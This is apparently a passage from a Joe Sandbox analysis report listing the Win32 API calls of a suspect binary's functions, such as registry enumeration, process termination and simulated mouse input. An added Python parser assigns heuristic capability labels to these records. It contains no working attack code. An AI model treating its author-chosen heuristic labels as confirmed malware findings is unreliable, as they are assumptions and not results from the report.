                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove$__itow__swprintf
                                          • String ID:
                                          • API String ID: 3253778849-0
                                          • Opcode ID: 040ed3faa825fe65c3412c21568763521d903e3cfb72be60eb4e581b301f4f82
                                          • Instruction ID: 220fce04883523549460980eeeae81ec66a58e16abf1f6482d96a0f3137d9f87
                                          • Opcode Fuzzy Hash: 040ed3faa825fe65c3412c21568763521d903e3cfb72be60eb4e581b301f4f82
                                          • Instruction Fuzzy Hash: FD61BC3050065AABCF11EF30CC96EFE7BA4EF48308F05955AF9596B292DB31A801CB70
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E50038,?,?), ref: 00E510BC
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E50548
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E50588
                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E505AB
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E505D4
                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E50617
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E50624
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                          • String ID:
                                          • API String ID: 4046560759-0
                                          • Opcode ID: 055dd09683b304d4f76daee80d8a3323c6f20dd598d0321c6ba23b909da5586a
                                          • Instruction ID: 86b069b17c76185cb8cc042175cab2eae1b525694ab9d3481e0c68fd49a86065
                                          • Opcode Fuzzy Hash: 055dd09683b304d4f76daee80d8a3323c6f20dd598d0321c6ba23b909da5586a
                                          • Instruction Fuzzy Hash: 1C513831108340AFC714EF64D885E6ABBE8FF88315F04595EF945A72A1EB71E908CB62
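Each function record above follows the same layout: direct API calls, calls reached through a sub-function ("Part of subcall function …"), the arguments Joe Sandbox could resolve ("?" where it could not), and the call-site address after "ref:". The Python below is an added example for this page, not Joe Sandbox code or output: it parses records in that layout into structured calls, counts which DLL each call lands in, and attaches a label when a function reaches a whole set of related APIs. The two records used as input are copied from this page (the registry record directly above and the token/SID record further down). The capability labels and the API sets behind them are this example's own heuristics, and reading the RegConnectRegistryW + RegEnumValueW pair as the interpreter's remote-capable registry enumeration is an assumption based on the report's "compiled AutoIt script" signature, not something the record itself states.

```python
"""Parse Joe Sandbox per-function 'APIs' records and summarise the Win32 API
surface each function reaches. Added example; not Joe Sandbox code. The
capability labels are this example's heuristics, not the report's."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# An API line is one of
#   • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E50588
#   • Part of subcall function 00E285F1: CopySid.ADVAPI32(...), ref: 00E28DD8
#   • _strlen.LIBCMT ref: 00E47058            (no argument list at all)
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass(frozen=True)
class ApiCall:
    api: str                   # e.g. "RegEnumValueW"
    module: str                # e.g. "ADVAPI32"
    args: tuple                # arguments as printed; "?" means unresolved
    ref: str                   # call-site address
    subcall_of: Optional[str]  # callee address when the call is indirect

def parse_api_block(text: str) -> list:
    """Return every API line of a record as an ApiCall; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # "APIs", "Strings", "Memory Dump Source", ...
        args = tuple(a for a in (m.group("args") or "").split(",") if a)
        sub = m.group("sub")
        calls.append(ApiCall(api=m.group("api"), module=m.group("module").upper(),
                             args=args, ref=m.group("ref").upper(),
                             subcall_of=sub.upper() if sub else None))
    return calls

def module_histogram(calls) -> Counter:
    """Number of calls per DLL / import library."""
    return Counter(c.module for c in calls)

# Heuristic (assumption of this example): a label applies only when the
# function reaches every API in the set, directly or via a sub-function.
CAPABILITIES = {
    "dynamic API resolution": {"LoadLibraryExW", "GetProcAddress"},
    "registry enumeration (remote-capable via RegConnectRegistry)":
        {"RegConnectRegistryW", "RegOpenKeyExW", "RegEnumValueW"},
    "synthesised mouse input": {"mouse_event"},
    "token SID inspection": {"GetTokenInformation", "CopySid"},
    "IPv4 socket helpers": {"htons", "inet_ntoa"},
}

def capabilities(calls, include_subcalls=True) -> list:
    """Sorted labels whose API set is fully present in the record."""
    names = {c.api for c in calls if include_subcalls or c.subcall_of is None}
    return sorted(label for label, needed in CAPABILITIES.items() if needed <= names)

# Constructed input: two records copied verbatim from this report.
REGISTRY_RECORD = """APIs
  • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
  • Part of subcall function 00E510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E50038,?,?), ref: 00E510BC
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E50548
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E50588
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E505AB
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E505D4
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E50617
• RegCloseKey.ADVAPI32(00000000), ref: 00E50624
"""

TOKEN_RECORD = """APIs
  • Part of subcall function 00E285F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E28608
  • Part of subcall function 00E285F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E28612
  • Part of subcall function 00E285F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E28621
  • Part of subcall function 00E285F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00E28628
  • Part of subcall function 00E285F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E2863E
• GetLengthSid.ADVAPI32(?,00000000,00E28977), ref: 00E28DAC
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E28DB8
• RtlAllocateHeap.NTDLL(00000000), ref: 00E28DBF
• CopySid.ADVAPI32(00000000,00000000,?), ref: 00E28DD8
• GetProcessHeap.KERNEL32(00000000,00000000,00E28977), ref: 00E28DEC
• HeapFree.KERNEL32(00000000), ref: 00E28DF3
"""

if __name__ == "__main__":
    for name, record in (("registry", REGISTRY_RECORD), ("token", TOKEN_RECORD)):
        calls = parse_api_block(record)
        print(name, dict(module_histogram(calls)), capabilities(calls))
```

Pasting any other record from this page into `parse_api_block` works the same way; passing `include_subcalls=False` restricts the labels to APIs the function calls itself, which is the right view when a sub-function such as 00E285F1 is shared by many callers and would otherwise tag all of them.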
                                          APIs
                                          • GetMenu.USER32(?), ref: 00E55A82
                                          • GetMenuItemCount.USER32(00000000), ref: 00E55AB9
                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E55AE1
                                          • GetMenuItemID.USER32(?,?), ref: 00E55B50
                                          • GetSubMenu.USER32(?,?), ref: 00E55B5E
                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E55BAF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountMessagePostString
                                          • String ID:
                                          • API String ID: 650687236-0
                                          • Opcode ID: 3bd39c6eed9a346c2562ff2c17b969b5983608795fe2353e0bfc9809a904d172
                                          • Instruction ID: c15a50a292a7e6733b352d380ff46513866726ee50699690ab7f68359381626c
                                          • Opcode Fuzzy Hash: 3bd39c6eed9a346c2562ff2c17b969b5983608795fe2353e0bfc9809a904d172
                                          • Instruction Fuzzy Hash: 96519F32A00615EFCF14EFA4C855AAEBBB4EF48311F10585AFD11B7351CB30AE448BA0
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00E2F3F7
                                          • VariantClear.OLEAUT32(00000013), ref: 00E2F469
                                          • VariantClear.OLEAUT32(00000000), ref: 00E2F4C4
                                          • _memmove.LIBCMT ref: 00E2F4EE
                                          • VariantClear.OLEAUT32(?), ref: 00E2F53B
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E2F569
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                          • String ID:
                                          • API String ID: 1101466143-0
                                          • Opcode ID: d6ec1e499c1744f8a0e98c3c02bdbfe27bb5146db3f0a89aefc63fc61bc15faf
                                          • Instruction ID: c3963f901a59e1f4afc1726c99834e8b83c70b9f73d746294532b43e39ba2898
                                          • Opcode Fuzzy Hash: d6ec1e499c1744f8a0e98c3c02bdbfe27bb5146db3f0a89aefc63fc61bc15faf
                                          • Instruction Fuzzy Hash: 4D5148B5A00219EFCB14DF58D884AAAB7B8FF4C354B158569E959EB310D730E911CFA0
                                          APIs
                                          • _memset.LIBCMT ref: 00E32747
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E32792
                                          • IsMenu.USER32(00000000), ref: 00E327B2
                                          • CreatePopupMenu.USER32 ref: 00E327E6
                                          • GetMenuItemCount.USER32(000000FF), ref: 00E32844
                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E32875
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                          • String ID:
                                          • API String ID: 3311875123-0
                                          • Opcode ID: 912009c9f744a636dfda84238c51f166bf8058ec8d8294b94f3c6b977fc8a9ad
                                          • Instruction ID: 8b677b21b5e585b22eb35977af82b0858ad682b7429ee32ca22258254b7c7541
                                          • Opcode Fuzzy Hash: 912009c9f744a636dfda84238c51f166bf8058ec8d8294b94f3c6b977fc8a9ad
                                          • Instruction Fuzzy Hash: F8518B70A00309EFDB29CF68D88CAAEBFF4AF44318F10556DEA91BB290D7709904CB51
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00DD179A
                                          • GetWindowRect.USER32(?,?), ref: 00DD17FE
                                          • ScreenToClient.USER32(?,?), ref: 00DD181B
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DD182C
                                          • EndPaint.USER32(?,?), ref: 00DD1876
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                          • String ID:
                                          • API String ID: 1827037458-0
                                          • Opcode ID: 97c13b06b9de3394b3a7b3539aa46fc7f7dd5437a42edde2ac9593bc53ee3249
                                          • Instruction ID: 1a471813727675a2f894251fb1656f4440d48b7428f97630be653aeedcca38a0
                                          • Opcode Fuzzy Hash: 97c13b06b9de3394b3a7b3539aa46fc7f7dd5437a42edde2ac9593bc53ee3249
                                          • Instruction Fuzzy Hash: 58417C74204300AFD720DF26D885BBA7BF8EB49724F14066AF9A4972A1C7719849DB71
                                          APIs
                                          • ShowWindow.USER32(00E967B0,00000000,00F72230,?,?,00E967B0,?,00E5B862,?,?), ref: 00E5B9CC
                                          • EnableWindow.USER32(00000000,00000000), ref: 00E5B9F0
                                          • ShowWindow.USER32(00E967B0,00000000,00F72230,?,?,00E967B0,?,00E5B862,?,?), ref: 00E5BA50
                                          • ShowWindow.USER32(00000000,00000004,?,00E5B862,?,?), ref: 00E5BA62
                                          • EnableWindow.USER32(00000000,00000001), ref: 00E5BA86
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E5BAA9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          • Opcode ID: 520c381bc72f84d2c9604907ea8a610625470f0a7c7d8e0d4ba628d094278b5e
                                          • Instruction ID: 522042f4565cd1f9a88717b741e1dfb07c5c4653ae42414c269a71ca665616be
                                          • Opcode Fuzzy Hash: 520c381bc72f84d2c9604907ea8a610625470f0a7c7d8e0d4ba628d094278b5e
                                          • Instruction Fuzzy Hash: 10415030600241AFDB26CF15C489B957BE0BB4531AF1856B9FE58AF2A3C731E849CB51
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00E45134,?,?,00000000,00000001), ref: 00E473BF
                                            • Part of subcall function 00E43C94: GetWindowRect.USER32(?,?), ref: 00E43CA7
                                          • GetDesktopWindow.USER32 ref: 00E473E9
                                          • GetWindowRect.USER32(00000000), ref: 00E473F0
                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E47422
                                            • Part of subcall function 00E354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E3555E
                                          • GetCursorPos.USER32(?), ref: 00E4744E
                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E474AC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                          • String ID:
                                          • API String ID: 4137160315-0
                                          • Opcode ID: 79074429d4474ba8f338a7251681a6d78545de9b6f216439615162a7ffa57ce9
                                          • Instruction ID: 7f66fc44885bbe3d73b013eae579066d13a42be22b415e9f3bcfdee5e7b8031e
                                          • Opcode Fuzzy Hash: 79074429d4474ba8f338a7251681a6d78545de9b6f216439615162a7ffa57ce9
                                          • Instruction Fuzzy Hash: 8931F232508305AFC724DF15D849EABBBE9FF88304F000919F499A7191DB30EA08CBD2
                                          APIs
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                            • Part of subcall function 00DEFEC6: _wcscpy.LIBCMT ref: 00DEFEE9
                                          • _wcstok.LIBCMT ref: 00E3EEFF
                                          • _wcscpy.LIBCMT ref: 00E3EF8E
                                          • _memset.LIBCMT ref: 00E3EFC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                          • String ID: X
                                          • API String ID: 774024439-3081909835
                                          • Opcode ID: b30980e86937940915a2caad6fddafdbc9360d087d328cb9af126f9de0a87260
                                          • Instruction ID: ed2bb7177095aa00d1c2fc90215bceb57d2ddcc15dfde6d49f78a615b94161d2
                                          • Opcode Fuzzy Hash: b30980e86937940915a2caad6fddafdbc9360d087d328cb9af126f9de0a87260
                                          • Instruction Fuzzy Hash: 52C193315083019FC714EF24D895A6ABBE4FF84314F04596EF899A73A2DB70ED45CBA2
                                          APIs
                                            • Part of subcall function 00E285F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E28608
                                            • Part of subcall function 00E285F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E28612
                                            • Part of subcall function 00E285F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E28621
                                            • Part of subcall function 00E285F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00E28628
                                            • Part of subcall function 00E285F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E2863E
                                          • GetLengthSid.ADVAPI32(?,00000000,00E28977), ref: 00E28DAC
                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E28DB8
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E28DBF
                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E28DD8
                                          • GetProcessHeap.KERNEL32(00000000,00000000,00E28977), ref: 00E28DEC
                                          • HeapFree.KERNEL32(00000000), ref: 00E28DF3
                                          Similarity
                                          • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                          • String ID:
                                          • API String ID: 169236558-0
                                          • Opcode ID: 7a2c18e9d164a38477c658a0ebba1da8bf49ad8a22805d2b04e43dd3cb8b1b77
                                          • Instruction ID: fa616326d9b414af6a3a4a092a945f4c90bccb21bed1914a0f5d385632a7d298
                                          • Opcode Fuzzy Hash: 7a2c18e9d164a38477c658a0ebba1da8bf49ad8a22805d2b04e43dd3cb8b1b77
                                          • Instruction Fuzzy Hash: B611E131902614FFDB149F65EE08BAE77ADFF5531AF108529E845B3251CB31AD08CB60
                                          APIs
                                            • Part of subcall function 00DD12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DD134D
                                            • Part of subcall function 00DD12F3: SelectObject.GDI32(?,00000000), ref: 00DD135C
                                            • Part of subcall function 00DD12F3: BeginPath.GDI32(?), ref: 00DD1373
                                            • Part of subcall function 00DD12F3: SelectObject.GDI32(?,00000000), ref: 00DD139C
                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00E5C1C4
                                          • LineTo.GDI32(00000000,00000003,?), ref: 00E5C1D8
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E5C1E6
                                          • LineTo.GDI32(00000000,00000000,?), ref: 00E5C1F6
                                          • EndPath.GDI32(00000000), ref: 00E5C206
                                          • StrokePath.GDI32(00000000), ref: 00E5C216
                                          Similarity
                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                          • String ID:
                                          • API String ID: 43455801-0
                                          • Opcode ID: 6063345c2dc27d45f1ae019ecaeb10219c10e145abed193aaffbe791eae0735a
                                          • Instruction ID: 0af4a425e6e1d91737cc519b2d2573b2b35ff32e2864ad857930b302ce41da76
                                          • Opcode Fuzzy Hash: 6063345c2dc27d45f1ae019ecaeb10219c10e145abed193aaffbe791eae0735a
                                          • Instruction Fuzzy Hash: 54111E7640020CBFDF119F91DC48E9A7FADEB04355F048422FA18661A1D7729D59DBA0
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DF03D3
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00DF03DB
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DF03E6
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DF03F1
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00DF03F9
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DF0401
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          • Opcode ID: 3d777bb82481eb7555e67698370793407793c51bad3a7143aab89dbfc95d2a8d
                                          • Instruction ID: 2e75dead394358ee7b94505bd6e81a13167abb00180e1bcecf11a32dcc6e793b
                                          • Opcode Fuzzy Hash: 3d777bb82481eb7555e67698370793407793c51bad3a7143aab89dbfc95d2a8d
                                          • Instruction Fuzzy Hash: 960148B09017597DE3009F5A8C85A52FEA8FF19354F00411BA15847941C7F5A868CBE5
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E3569B
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E356B1
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00E356C0
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E356CF
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E356D9
                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E356E0
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          • Opcode ID: c3d149b30bf805c53216dbaa6fddf91056ad632a14d2f50383ed55dc0593963a
                                          • Instruction ID: c8ef6b930f79d94c5d9360c3fa0bc99548ac0ebee5710b8f20b025cf033d4180
                                          • Opcode Fuzzy Hash: c3d149b30bf805c53216dbaa6fddf91056ad632a14d2f50383ed55dc0593963a
                                          • Instruction Fuzzy Hash: 85F06232141618BFE7245B539D0DEAB7F7CEBC6B12F000569FA00E105196A01A0586F5
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?), ref: 00E374E5
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00E374F6
                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00DE1044,?,?), ref: 00E37503
                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00DE1044,?,?), ref: 00E37510
                                            • Part of subcall function 00E36ED7: CloseHandle.KERNEL32(00000000,?,00E3751D,?,00DE1044,?,?), ref: 00E36EE1
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E37523
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00E3752A
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          • Opcode ID: dba931028e210dc8b7c8ddec3e4caf489e606d52ca01841bfa5fc037ab65d907
                                          • Instruction ID: 4ae0c5b7d8cddacf0e92d56e3f055fd35072e0c51ce9975644568bbe0ac76fd8
                                          • Opcode Fuzzy Hash: dba931028e210dc8b7c8ddec3e4caf489e606d52ca01841bfa5fc037ab65d907
                                          • Instruction Fuzzy Hash: D4F09ABA441712AFEB192B25EC8CAEB3B2AAF04303F001931F602B04B1CB715808CA50
                                          APIs
